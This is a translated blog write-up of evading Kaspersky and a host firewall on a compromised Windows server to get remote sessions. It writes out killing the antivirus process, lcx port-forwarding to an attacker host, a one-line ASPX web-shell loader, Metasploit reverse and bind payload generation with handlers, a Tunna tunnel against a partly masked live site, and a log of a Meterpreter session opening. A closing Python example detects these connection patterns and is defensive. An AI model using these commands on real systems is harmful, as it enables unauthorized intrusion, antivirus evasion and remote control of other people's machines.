A summary of techniques for reverse connections and port forwarding around the firewall
2022-06-24 07:29:00 【Xiaoxiang Xin'an】
Statement: Most of the articles on this official account come from the author's daily notes; a few are reproduced with the authorization of the original author or of other official accounts. Unauthorized reprinting is strictly prohibited; if you want to reprint, contact us to discuss it. Do not use the techniques in this article for illegal testing; any adverse consequences arising from this are unrelated to the author and the official account.
0x01 Preface
Date: 2014. Recently I went through some pain setting up port forwarding on an intranet server that runs Kaspersky Anti-Virus 8.0. In a normal environment Lcx is used directly on the intranet to forward the specified port, but how do you bypass the firewall? I wrote this record according to the practical testing process.
Bypassing Kaspersky to get a session:
kavfswp.exe is Kaspersky's anti-virus worker process, used to intercept malicious programs such as the common privilege-escalation EXPs and MSF payloads. During testing, however, it was found that this process can be terminated (it has auto-restart): it restarts automatically a few seconds after being killed, but there is a gap of a few seconds in between, and that interval is enough to quickly upload the MSF payload and run it.
Note: several times it was found that kavfswp.exe did not restart for a long time; the test was a bit painful, so I will not worry about this problem further.
```
taskkill /f /im kavfswp.exe
```
In the actual test, after Kaspersky's anti-virus protection was turned off, forwarding still did not work normally, so I guessed that the system firewall was turned on or that there was some other hardware firewall. The following tools and methods were tested in this bypass case.
0x02 Lcx
In a regular intranet environment, Lcx.exe can be used directly to forward the specified port, and then connecting locally to port 1234 is enough. But here we can see that the connection status of port 51, which we are listening on, stays at SYN_SENT; most likely it is blocked by the firewall's inbound and outbound rules.
```
C:\Recovery\lcx.exe -listen 51 1234
C:\Recovery\lcx.exe -slave 113.xxx.xx.5 51 127.0.0.1 3389

[option:]
-listen <ConnectPort> <TransmitPort>
-tran   <ConnectPort> <TransmitHost> <TransmitPort>
-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>
```
Tip from my buddy @KoMas: change the Lcx listening port to 80 and you can bypass the firewall restriction. During the test, check whether local port 80 is already occupied; if it is, an error will be returned. Picture missing. (Success!)
0x03 Aspx Client
The Aspx Client one-line code:
```
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
```
```
C:\Recovery\lcx.exe -listen 52 1234
[+] Listening port 52 ......
[+] Listen OK!
[+] Listening port 1234 ......
[+] Listen OK!
[+] Waiting for Client on port:52 ......
```
0x04 Metasploit
(1) Reverse_tcp
Use Metasploit to generate the attack payload and start the listener, then upload the payload file port.exe to the target disk through the webshell and execute it. You can see that the connection is blocked by the firewall, as shown in the figure below.
```
[email protected]:~# msfpayload windows/meterpreter/reverse_tcp LHOST=113.***.**.250 LPORT=12345 X > /media/hake/port.exe
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.10
msf exploit(handler) > set LPORT 12345
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.10:12345
[*] Starting the payload handler...
```
The article "Metasploit bind_tcp practical application" mentions this precaution: if the reverse_tcp reverse connection is blocked, try changing the port to 80, 443 or 8080, since these ports are rarely blocked. The actual test found that the listening port only needs to be changed to 80 to bypass the firewall restriction and get a Meterpreter session. (Success!)
(2) Bind_tcp
Use bind_tcp for a forward-connection test with listening port 9999. After running the payload, port 9999 is opened on the target host, but a TCP connection cannot be established from our attack machine's IP.
```
[email protected]:~# msfpayload windows/meterpreter/bind_tcp LPORT=9999 X > /media/hake/port.exe
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(handler) > set RHOST 80.**.**.21
msf exploit(handler) > set LPORT 9999
msf exploit(handler) > exploit
[*] Started bind handler
[*] Starting the payload handler...
```
(3) Reverse_http
The Metasploit reverse_http idea comes from an article by an expert at 90sec and DM_, "Notes on metasploit intranet penetration", but in the actual test it was found that using other ports gets blocked by the firewall, as shown in the figure below.
```
[email protected]:~# msfpayload windows/meterpreter/reverse_http LHOST=113.***.**.236 LPORT=4444 R | msfencode -t aspx -o /media/hake/port.aspx
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST 192.168.1.9
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
[*] Started HTTP reverse handler on http://0.0.0.0:4444/
[*] Starting the payload handler...
```
Tip from my buddy @darkz3r: he usually uses port 443 as the listening port. I tried it just to see, and did not expect it to actually succeed; according to him, hackers abroad often use port 443 for listening.
(4) Reverse_https
Earlier we tested reverse_tcp on listening port 1234 and reverse_http on listening port 4444, both of which were blocked by the firewall; but testing reverse_https on listening port 4444, it was found that the firewall restriction was successfully bypassed and a Meterpreter session obtained. Picture missing.
```
[email protected]:~# msfpayload windows/meterpreter/reverse_https LHOST=113.***.**.106 LPORT=4444 X > /media/hake/test.exe
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.1.9
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...
[*] 113.***.**.106:2069 Request received for /5xWX...
[*] 113.***.**.106:2069 Staging connection for target /5xWX received...
[*] Patched user-agent at offset 663656...
[*] Patched transport at offset 663320...
[*] Patched URL at offset 663384...
[*] Patched Expiration Timeout at offset 664256...
[*] Patched Communication Timeout at offset 664260...
[*] Meterpreter session 3 opened (192.168.1.5:4444 -> 80.**.**.21:2069) at 2014-08-05 23:49:20 +0800
```
0x05 reDuh_Gui
The scripts supported by reDuh_Gui are ASPX/PHP/JSP; in penetration testing it depends on which scripts the target host supports. The target host tested here supports ASPX/PHP scripts, so the ASPX script was used for the demo test, as shown in the figure below.
0x06 Http_Tunna
reDuh, Tunna and reGeorg, which we often use, are all forward proxies: upload the proxy script to the server, have the local program connect to the script on the server, and the script acts as the proxy that forwards the port and the traffic. This is also called port multiplexing, or an HTTP tunnel.
Although Http_Tunna and reDuh_Gui work the same way, Http_Tunna is faster and more stable than reDuh_Gui. Supported scripts include ASPX/PHP/JSP, and it can also be used directly within the Metasploit framework, but first the tunna_exploit.rb file has to be copied into the MSF modules directory. Picture missing.
```
[email protected]:~# ruby proxy.rb -u http://www.canton*********dolonne.fr/u_fichier/conn.aspx -l 1234 -r 3389 -v
msf > use exploit/windows/misc/tunna_exploit
msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(tunna_exploit) > set RHOST 113.***.**.236
msf exploit(tunna_exploit) > set TARGETURI http://www.canton*********dolonne.fr/u_fichier/conn.aspx
msf exploit(tunna_exploit) > set VERBOSE true
msf exploit(tunna_exploit) > exploit -j
```
Note: in testing, reDuh_Gui succeeded while Http_Tunna failed. Maybe my technique was wrong, or it may be a problem with the Http_Tunna ASPX script; master @Chen Xiaobing also mentioned in his article that the JSP and PHP port forwarding succeeded. More testing is therefore needed in practice, and the author will not study the reasons for the failure in detail.
0x07 Bypass Firewall
Ⅰ. Use a reverse connection and test listening ports such as 80/443 to see whether the firewall restriction can be bypassed. (Success!)
1. Lcx, 2. Aspx Client, 3.1 Reverse_tcp, 3.3 Reverse_http, 3.4 Reverse_https
Ⅱ. Use a forward connection and test the Bind_tcp payload to see whether the firewall restriction can be bypassed. (Failure!)
3.2 Bind_tcp
Ⅲ. Use an HTTP tunnel and test reDuh_Gui, Tunna_0.1 and similar tools to see whether the firewall restriction can be bypassed. (Success!)
4. reDuh_Gui, 5. Http_Tunna, reGeorg, neo_reGeorg
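From the defender's side, each of the three outcomes above leaves a distinct trace in the host's connection table: an egress attempt stuck in SYN_SENT (section 0x02), an established connection to 80/443 from an image that is not a browser or updater (the successful reverse connections), a new listener on an odd port (bind_tcp), and a web worker reaching a loopback service such as RDP (the HTTP tunnel and the lcx -slave to 127.0.0.1:3389). The following added example, which is not from the original post, flags those four patterns in constructed `netstat -ano` output; the pid-to-image map, the address values and the policy sets (allowed egress images, web-worker names, sensitive loopback ports, known listeners) are all assumptions to be tuned per host.

```python
import re

# Constructed sample of "netstat -ano" output; addresses and pids are made up.
NETSTAT = """
  TCP    192.168.1.20:49700     113.0.0.5:51         SYN_SENT        1488
  TCP    192.168.1.20:49701     113.0.0.5:80         ESTABLISHED     1488
  TCP    192.168.1.20:49702     113.0.0.6:443        ESTABLISHED     2100
  TCP    127.0.0.1:49703        127.0.0.1:3389       ESTABLISHED     3012
  TCP    0.0.0.0:9999           0.0.0.0:0            LISTENING       2100
  TCP    192.168.1.20:49704     40.0.0.7:443         ESTABLISHED     880
"""
# Assumed pid -> image map, as one would build from "tasklist" on the same host.
PROCS = {1488: "lcx.exe", 2100: "port.exe", 3012: "w3wp.exe", 880: "svchost.exe"}

# Assumed host policy (tuning knobs, not fixed facts).
ALLOWED_EGRESS = {"svchost.exe"}        # images that may leave on 80/443
WEB_WORKERS = {"w3wp.exe"}              # images that serve the web application
SENSITIVE_LOCAL = {3389: "RDP", 445: "SMB"}  # loopback ports a web worker never needs
KNOWN_LISTENERS = {80, 443, 3389}       # ports this server is expected to listen on

LINE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$")

def parse(text):
    """Yield (image, laddr, lport, raddr, rport, state) for each TCP line."""
    for m in (LINE.match(line) for line in text.splitlines()):
        if m:
            la, lp, ra, rp, st, pid = m.groups()
            yield PROCS.get(int(pid), f"pid:{pid}"), la, int(lp), ra, int(rp), st

def findings(text):
    """Return (image, reason) pairs for connections matching the four patterns."""
    out = []
    for img, la, lp, ra, rp, st in parse(text):
        if st == "LISTENING" and lp not in KNOWN_LISTENERS:
            out.append((img, f"new listener on {lp} (bind-style payload?)"))
        elif st == "SYN_SENT" and img not in ALLOWED_EGRESS:
            out.append((img, f"egress to {ra}:{rp} stuck in SYN_SENT (blocked attempt)"))
        elif st == "ESTABLISHED" and rp in (80, 443) and ra != "127.0.0.1" \
                and img not in ALLOWED_EGRESS:
            out.append((img, f"outbound {rp} to {ra} from unexpected image"))
        elif st == "ESTABLISHED" and ra == "127.0.0.1" and img in WEB_WORKERS \
                and rp in SENSITIVE_LOCAL:
            out.append((img, f"web worker reaching loopback {SENSITIVE_LOCAL[rp]} (HTTP tunnel?)"))
    return out

if __name__ == "__main__":
    for img, reason in findings(NETSTAT):
        print(f"{img:12} {reason}")
```

Only the svchost.exe connection to 443 passes as expected; the point is that once 80/443 are open outbound, the image owning the socket, not the port, is what separates a reverse session from normal traffic.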